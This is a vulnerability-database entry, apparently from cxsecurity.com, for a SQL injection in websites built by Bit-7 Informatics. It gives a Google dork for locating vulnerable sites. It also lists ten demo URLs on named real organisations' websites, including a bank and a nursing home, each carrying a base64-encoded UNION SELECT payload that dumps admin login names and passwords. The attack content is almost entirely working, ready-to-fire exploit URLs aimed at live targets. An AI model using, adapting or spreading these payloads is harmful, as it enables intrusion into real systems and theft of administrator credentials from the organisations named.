Powered By Bit-7 Informatics Base64_Encoded SQL injection

2016.02.11
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################# # Exploit Title : Powered By Bit-7 Informatics Base64_Encoded SQL injection # Exploit Author : Ashiyane Digital Security Team # Vendor Homepage: http://www.bit7informatics.com/ # Google Dork : "intext:Powered By : Bit-7 Informatics" inurl:.php?id= # Date : 10Feb 2016 # Tested On : Win 10 | CyberFox Browser & Kali Linux | IceWeasel # ################################# # Vulnerable Parameter : id # Attack Like : site/*.php?id= Base64_Encoded ---->SQLi<-------- # ################################# # Demos : # # http://www.mgbank.co.in/newsdetail.php?id=MnM1JyBVbmlPbiBTZWxlQ1QgMSxncm91cF9jb25jYXQobG9naW5pZCwweDBhLHBhc3N3LCc8L2JyPicpLDMsNCw1IGZyb20gYWRtbG9naW4tLSAt # # http://www.iifmalumni.org/newsdetail.php?id=MnM1JyBVbmlPbiBTZWxlQ1QgMSxncm91cF9jb25jYXQobG9naW5pZCwweDBhLHBhc3N3LCc8L2JyPicpLDMsNCw1IGZyb20gYWRtbG9naW4tLSAt # # http://www.mpwarehousing.com/newsdetail.php?id=MnM1JyBVbmlPbiBTZWxlQ1QgMSxncm91cF9jb25jYXQobG9naW5pZCwweDBhLHBhc3N3LCc8L2JyPicpLDMsNCw1IGZyb20gYWRtbG9naW4tLSAt # # http://nethomes.in/projects.php?id=bnVsbCBVbmlPbiBTZWxlQ1QgMSxncm91cF9jb25jYXQodXNlcl9pZCwweDdlN2U3ZTdlM2UscGFzcywweDNjMmY2MjcyM2UpLDMsNCw1LDYsNyw4LDksMTAsMTEsMTIsMTMsMTQgZnJvbSAgYWRtaW5fbG9naW4tLQ== # # http://dsaindia.org/newsdetail.php?id=MnM1JyAgVW5pT04gc0VMRWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJfaWQsMHg3ZTdlN2UzZSxwYXNzKSwzLDQsNSw2LDcgZnJvbSBhZG1pbl9sb2dpbi0tIC0= # # http://www.mplus.co.in/gallerydetail.php?id=c2RzZCcgVW5pb24gU2VsZWN0IDEsZ3JvdXBfY29uY2F0KGxvZ2luaWQsMHgwYSxwYXNzdywnPC9icj4nKSwzIGZyb20gYWRtbG9naW4tLSAt # # http://www.mkpondacollege.org/eventdetail.php?id=c2RzZCcgVW5pb24gU2VsZWN0IDEsZ3JvdXBfY29uY2F0KGxvZ2luaWQsMHgwYSxwYXNzdywnPC9icj4nKSwzLDQgZnJvbSBhZG1sb2dpbi0tIC0= # # http://www.ankurnursinghome.com/gallerydetail.php?id=c2RzZCcgVW5pb24gU2VsZWN0IDEsZ3JvdXBfY29uY2F0KGxvZ2luaWQsMHgwYSxwYXNzdywnPC9icj4nKSwzIGZyb20gYWRtbG9naW4tLSAt # # http://www.areraclub.org/newsdetail.php?id=c2RzZCcgVW5pb24gU2VsZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJfaWQsMHgwYSxwYXNzLCc8L2JyPicpLDMsNCw1LDYgZnJvbSBhZG1pbl9sb2dpbi0tIC0= # # http://www.surendra.co.in/newsdetail.php?id=c2RzZCcgVW5pb24gU2VsZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJfaWQsMHgwYSxwYXNzLCc8L2JyPicpLDMsNCw1LDYgZnJvbSBhZG1pbl9sb2dpbi0tIC0= # # ################################# # Discovered by : Ac!D # tnQ : H.empire , M.hidden , M.hacking , Sh.BlackHAT , V for vendetta , Sh.Cloner & Hassan #################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top